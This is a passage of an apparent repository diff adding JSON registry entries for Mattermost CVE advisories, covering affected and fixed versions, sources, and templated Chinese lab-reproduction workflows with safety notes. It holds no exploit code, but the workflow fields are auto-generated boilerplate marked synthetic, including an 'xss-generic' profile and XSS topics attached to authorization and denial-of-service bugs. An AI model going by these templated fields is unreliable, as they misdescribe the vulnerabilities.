"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260105134819-cc427af41b2a, introduced=0, fixed<5.3.2-0.20260105134819-cc427af41b2a, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260105134819-cc427af41b2a`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `authz-bypass` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "ready"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Mattermost"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-2463--workflow"
}
}

230
08-threat-intel/registry/advisories/mattermost--CVE-2026-24692.json 普通文件
查看文件

@@ -0,0 +1,230 @@
{
"canonical_id": "mattermost--CVE-2026-24692",
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "Mattermost fails to properly enforce read permissions in search API endpoints",
"summary": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to properly enforce read permissions in search API endpoints which allows guest users without read permissions to access posts and files in channels via search API requests. Mattermost Advisory ID: MMSA-2025-00554",
"published_at": "2026-03-16T15:30:47Z",
"updated_at": "2026-03-23T18:55:57.125165Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24692",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-cwfj-642j-gfh4",
"https://github.com/mattermost/mattermost/commit/0481bd1fb04584db97eca45fd58ebd06c8200df4",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-24692",
"GO-2026-4745",
"GHSA-cwfj-642j-gfh4"
],
"cve_ids": [
"CVE-2026-24692"
],
"ghsa_ids": [
"GHSA-cwfj-642j-gfh4"
],
"osv_ids": [
"GHSA-cwfj-642j-gfh4",
"GO-2026-4745"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260107142155-0481bd1fb045",
"introduced=0, fixed<5.3.2-0.20260107142155-0481bd1fb045",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260107142155-0481bd1fb045",
"5.3.2-0.20260107142155-0481bd1fb045",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-24692.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"entity_refs": [
{
"entity_id": "mattermost",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "mattermost",
"official": true
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
}
],
"affected_components": [
{
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"introduced=0, fixed<8.0.0-20260107142155-0481bd1fb045",
"introduced=0, fixed<5.3.2-0.20260107142155-0481bd1fb045",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260107142155-0481bd1fb045",
"5.3.2-0.20260107142155-0481bd1fb045",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260107142155-0481bd1fb045",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-24692",
"https://github.com/advisories/GHSA-cwfj-642j-gfh4",
"https://github.com/mattermost/mattermost/commit/0481bd1fb04584db97eca45fd58ebd06c8200df4",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260107142155-0481bd1fb045",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260107142155-0481bd1fb045",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260107142155-0481bd1fb045",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260107142155-0481bd1fb045",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260107142155-0481bd1fb045"
],
"version_sync_confidence": "high",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-24692--workflow",
"vuln_family": "unknown",
"entry_surface": "repo-surface",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260107142155-0481bd1fb045, introduced=0, fixed<5.3.2-0.20260107142155-0481bd1fb045, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "unknown",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260107142155-0481bd1fb045",
"introduced=0, fixed<5.3.2-0.20260107142155-0481bd1fb045",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `unknown` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/repo"
],
"input_shape": "\u63d0\u4ea4\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\u3002",
"expected_unsafe_behavior": "\u76ee\u6807\u8868\u73b0\u51fa\u8d85\u51fa\u8bbe\u8ba1\u8fb9\u754c\u7684\u884c\u4e3a\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260107142155-0481bd1fb045, introduced=0, fixed<5.3.2-0.20260107142155-0481bd1fb045, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260107142155-0481bd1fb045`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `unknown` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "ready"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Mattermost"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-24692--workflow"
}
}

230
08-threat-intel/registry/advisories/mattermost--CVE-2026-2578.json 普通文件
查看文件

@@ -0,0 +1,230 @@
{
"canonical_id": "mattermost--CVE-2026-2578",
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "Mattermost fails to preserve the redacted state of burn-on-read posts during deletion",
"summary": "Mattermost versions 11.3.x <= 11.3.0 fail to preserve the redacted state of burn-on-read posts during deletion which allows channel members to access unrevealed burn-on-read message contents via the WebSocket post deletion event. Mattermost Advisory ID: MMSA-2026-00579",
"published_at": "2026-03-16T15:30:43Z",
"updated_at": "2026-03-23T18:56:01.583567Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2578",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-3rhr-jr63-hwq5",
"https://github.com/mattermost/mattermost/commit/c6b205f0d77080ef805783de0628b9526af7faec",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-2578",
"GO-2026-4734",
"GHSA-3rhr-jr63-hwq5"
],
"cve_ids": [
"CVE-2026-2578"
],
"ghsa_ids": [
"GHSA-3rhr-jr63-hwq5"
],
"osv_ids": [
"GHSA-3rhr-jr63-hwq5",
"GO-2026-4734"
],
"affected_versions": [
"introduced=0, fixed<8.0.0-20260127062706-c6b205f0d770",
"introduced=0, fixed<5.3.2-0.20260127062706-c6b205f0d770",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_versions": [
"8.0.0-20260127062706-c6b205f0d770",
"5.3.2-0.20260127062706-c6b205f0d770",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"package_name": "github.com/mattermost/mattermost-server",
"render_markdown": true,
"case_path": "07-framework-security/platforms/mattermost/cases/mattermost-cve-2026-2578.md",
"secure_code_topics": [
"authz-server-side-recheck",
"xss-output-encoding",
"token-cookie-storage",
"dependency-upgrade-policy"
],
"status": "generated",
"triage_reasons": [],
"entity_refs": [
{
"entity_id": "mattermost",
"entity_type": "system",
"relation": "root-system",
"root_system_id": "mattermost",
"official": true
},
{
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"entity_type": "repo",
"relation": "affected-component",
"root_system_id": "mattermost",
"official": false
}
],
"affected_components": [
{
"name": "mattermost / mattermost-server",
"entity_id": "mattermost--repo--github-com-mattermost-mattermost-server",
"scope": "repo",
"package_name": "github.com/mattermost/mattermost-server",
"official": false
}
],
"affected_version_ranges": [
"introduced=0, fixed<8.0.0-20260127062706-c6b205f0d770",
"introduced=0, fixed<5.3.2-0.20260127062706-c6b205f0d770",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"fixed_version_ranges": [
"8.0.0-20260127062706-c6b205f0d770",
"5.3.2-0.20260127062706-c6b205f0d770",
"10.11.11",
"11.2.3",
"11.3.1",
"10.11.11+incompatible",
"11.2.3+incompatible",
"11.3.1+incompatible"
],
"introduced_version": "introduced=0",
"patched_version": "8.0.0-20260127062706-c6b205f0d770",
"version_evidence_sources": [
"https://nvd.nist.gov/vuln/detail/CVE-2026-2578",
"https://github.com/advisories/GHSA-3rhr-jr63-hwq5",
"https://github.com/mattermost/mattermost/commit/c6b205f0d77080ef805783de0628b9526af7faec",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"affected_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-8-0-0-20260127062706-c6b205f0d770",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0-fixed-5-3-2-0-20260127062706-c6b205f0d770",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-fixed-10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-2-0-rc1-fixed-11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-11-3-0-rc1-fixed-11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-10-11-0-rc1-incompatible-fixed-10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--introduced-0"
],
"fixed_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260127062706-c6b205f0d770",
"mattermost--repo--github-com-mattermost-mattermost-server--5-3-2-0-20260127062706-c6b205f0d770",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1",
"mattermost--repo--github-com-mattermost-mattermost-server--10-11-11-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-2-3-incompatible",
"mattermost--repo--github-com-mattermost-mattermost-server--11-3-1-incompatible"
],
"patched_version_refs": [
"mattermost--repo--github-com-mattermost-mattermost-server--8-0-0-20260127062706-c6b205f0d770"
],
"version_sync_confidence": "high",
"advisory_scope": "repo",
"version_confidence": "high",
"version_gap_reason": "",
"version_resolution_needed": false,
"workflow": {
"workflow_id": "mattermost--CVE-2026-2578--workflow",
"vuln_family": "unknown",
"entry_surface": "repo-surface",
"preconditions": [
"\u4ec5\u5728 lab-local\u3001lab-public \u6216\u660e\u786e\u6388\u6743\u76ee\u6807\u4e2d\u6267\u884c\u3002",
"\u786e\u8ba4\u76ee\u6807\u547d\u4e2d\u7248\u672c\u65ad\u8a00: introduced=0, fixed<8.0.0-20260127062706-c6b205f0d770, introduced=0, fixed<5.3.2-0.20260127062706-c6b205f0d770, introduced=10.11.0-rc1, fixed<10.11.11",
"\u82e5\u5bf9\u8c61\u5c5e\u4e8e `repo`\uff0c\u5148\u786e\u8ba4\u6269\u5c55/\u4ed3\u5e93/\u5305\u5df2\u542f\u7528\u5e76\u5904\u4e8e\u53d7\u5f71\u54cd\u7248\u672c\u3002"
],
"required_role": "unknown",
"affected_version_assertion": [
"introduced=0, fixed<8.0.0-20260127062706-c6b205f0d770",
"introduced=0, fixed<5.3.2-0.20260127062706-c6b205f0d770",
"introduced=10.11.0-rc1, fixed<10.11.11",
"introduced=11.2.0-rc1, fixed<11.2.3",
"introduced=11.3.0-rc1, fixed<11.3.1",
"introduced=10.11.0-rc1+incompatible, fixed<10.11.11+incompatible",
"introduced=0"
],
"trigger_vector": "\u5bf9 `unknown` \u5bb6\u65cf\u5165\u53e3\u6295\u9012\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\uff0c\u6bd4\u8f83\u4fee\u590d\u524d\u540e\u5dee\u5f02\u3002",
"request_or_ui_path": [
"/repo"
],
"input_shape": "\u63d0\u4ea4\u6700\u5c0f\u5316\u3001\u53ef\u5ba1\u8ba1\u3001\u53ef\u56de\u6eda\u7684\u53d7\u63a7\u8f93\u5165\u3002",
"expected_unsafe_behavior": "\u76ee\u6807\u8868\u73b0\u51fa\u8d85\u51fa\u8bbe\u8ba1\u8fb9\u754c\u7684\u884c\u4e3a\u3002",
"server_evidence_points": [
"\u5e94\u7528\u65e5\u5fd7\u4e2d\u7684\u547d\u4e2d\u8def\u5f84\u3001\u9274\u6743\u51b3\u7b56\u548c\u5f02\u5e38\u6808",
"\u53cd\u5411\u4ee3\u7406\u6216\u8fb9\u754c\u5c42\u65e5\u5fd7\u4e2d\u7684\u8bf7\u6c42\u5934\u3001\u6765\u6e90 IP \u4e0e\u8def\u7531\u51b3\u7b56"
],
"browser_evidence_points": [
"\u57fa\u7ebf\u622a\u56fe\u4e0e\u653b\u51fb\u540e\u622a\u56fe\u7684 DOM/\u89c6\u89c9\u5dee\u5f02",
"console\u3001network \u4e0e response metadata \u4e2d\u7684\u5f02\u5e38\u4fe1\u53f7"
],
"db_or_fs_evidence_points": [
"\u6570\u636e\u5e93\u4e2d\u65b0\u589e/\u8d8a\u6743\u8bfb\u53d6\u7684\u6d4b\u8bd5\u6570\u636e",
"\u6587\u4ef6\u7cfb\u7edf\u4e2d\u65b0\u589e\u4e0a\u4f20\u6837\u672c\u3001\u7f13\u5b58\u6761\u76ee\u6216\u8d8a\u6743\u8bfb\u53d6\u75d5\u8ff9"
],
"detection_signals": [
"WAF / reverse proxy \u5f02\u5e38\u65e5\u5fd7\u3001\u8bbf\u95ee\u65e5\u5fd7\u548c\u544a\u8b66",
"\u5e94\u7528\u5ba1\u8ba1\u65e5\u5fd7\u4e2d\u7684\u6743\u9650\u9519\u8bef\u3001\u91cd\u5b9a\u5411\u5f02\u5e38\u3001\u6a21\u677f\u6e32\u67d3\u6216\u4e0a\u4f20\u843d\u76d8\u4e8b\u4ef6"
],
"mitigation_summary": "\u4f18\u5148\u5347\u7ea7\u5230\u4fee\u590d\u7248\u672c\uff0c\u5e76\u540c\u65f6\u6536\u7d27\u8f93\u5165\u6821\u9a8c\u3001\u670d\u52a1\u7aef\u9274\u6743\u3001\u4ee3\u7406\u4fe1\u4efb\u8fb9\u754c\u3001\u6269\u5c55\u5b89\u88c5\u4fe1\u4efb\u548c\u5ba1\u8ba1\u65e5\u5fd7\u3002",
"patch_validation_steps": [
"\u786e\u8ba4\u76ee\u6807\u7248\u672c\u4ece `introduced=0, fixed<8.0.0-20260127062706-c6b205f0d770, introduced=0, fixed<5.3.2-0.20260127062706-c6b205f0d770, introduced=10.11.0-rc1, fixed<10.11.11` \u5347\u7ea7\u6216\u56de\u79fb\u5230 `8.0.0-20260127062706-c6b205f0d770`\u3002",
"\u4fdd\u7559\u540c\u4e00\u7ec4\u53d7\u63a7\u8f93\u5165\uff0c\u5728\u4fee\u590d\u524d\u540e\u5206\u522b\u6267\u884c\u5e76\u6bd4\u5bf9\u54cd\u5e94\u3001\u65e5\u5fd7\u4e0e\u6d4f\u89c8\u5668\u8bc1\u636e\u3002",
"\u786e\u8ba4\u4fee\u590d\u540e\u4ec5\u4fdd\u7559\u9884\u671f\u4e1a\u52a1\u884c\u4e3a\uff0c\u4e0d\u518d\u89e6\u53d1\u8d8a\u6743\u3001\u56de\u663e\u3001\u5f02\u5e38\u6e32\u67d3\u6216\u9519\u8bef\u8bf7\u6c42\u3002",
"\u8865\u5145 `unknown` \u65cf\u81ea\u52a8\u5316\u56de\u5f52\uff0c\u907f\u514d\u540c\u7c7b\u8def\u5f84\u5728\u63d2\u4ef6\u3001\u4e3b\u9898\u6216\u4ee3\u7406\u94fe\u4e2d\u56de\u5f52\u3002"
],
"lab_safety_notes": [
"\u53ea\u4f7f\u7528\u56de\u73af\u5730\u5740\u3001\u54e8\u5175\u76ee\u6807\u3001\u65e0\u5bb3\u6837\u672c\u6216\u53ef\u56de\u6eda\u6d4b\u8bd5\u6570\u636e\u3002",
"\u7981\u6b62\u9020\u6210\u6301\u4e45\u7834\u574f\u3001\u8d8a\u6743\u4e0b\u8f7d\u771f\u5b9e\u6570\u636e\u6216\u4e0d\u53ef\u56de\u6eda side effect\u3002",
"\u5982\u9700\u6d4f\u89c8\u5668\u8bc1\u636e\uff0c\u4fdd\u7559 baseline / proof \u4e24\u4efd\u5feb\u7167\u4ee5\u53ca console / network \u8bb0\u5f55\u3002"
],
"review_state": "ready"
},
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"historical_status": null,
"latest_status": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Mattermost"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 2,
"entity_ref_count": 2,
"advisory_scope": "repo",
"version_confidence": "high",
"workflow_id": "mattermost--CVE-2026-2578--workflow"
}
}

231
08-threat-intel/registry/advisories/mattermost--CVE-2026-25780.json 普通文件
查看文件

@@ -0,0 +1,231 @@
{
"canonical_id": "mattermost--CVE-2026-25780",
"system_id": "mattermost",
"display_name": "Mattermost",
"category": "platforms",
"advisory_mode": "core",
"title": "Mattermost fails to bound memory allocation when processing DOC files",
"summary": "Mattermost versions 11.3.x <= 11.3.0, 11.2.x <= 11.2.2, 10.11.x <= 10.11.10 fail to bound memory allocation when processing DOC files which allows an authenticated attacker to cause server memory exhaustion and denial of service via uploading a specially crafted DOC file.. Mattermost Advisory ID: MMSA-2026-00581",
"published_at": "2026-03-16T15:30:42Z",
"updated_at": "2026-03-23T18:56:18.467718Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "ecosystem-authority",
"official_source_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25780",
"secondary_source_urls": [
"https://github.com/advisories/GHSA-xv2p-wchj-qjhp",
"https://github.com/mattermost/mattermost/commit/86797c508c444e299b20889ce241fde505a402cc",
"https://github.com/mattermost/mattermost",
"https://mattermost.com/security-updates"
],
"aliases": [
"CVE-2026-25780",
"GO-2026-4733",
"GHSA-xv2p-wchj-qjhp"
],
"cve_ids": [
"CVE-2026-25780"
],
"ghsa_ids": [
"GHSA-xv2p-wchj-qjhp"
],
"osv_ids": [
"GHSA-xv2p-wchj-qjhp",
"GO-2026-4733"
],
"affected_versions": [
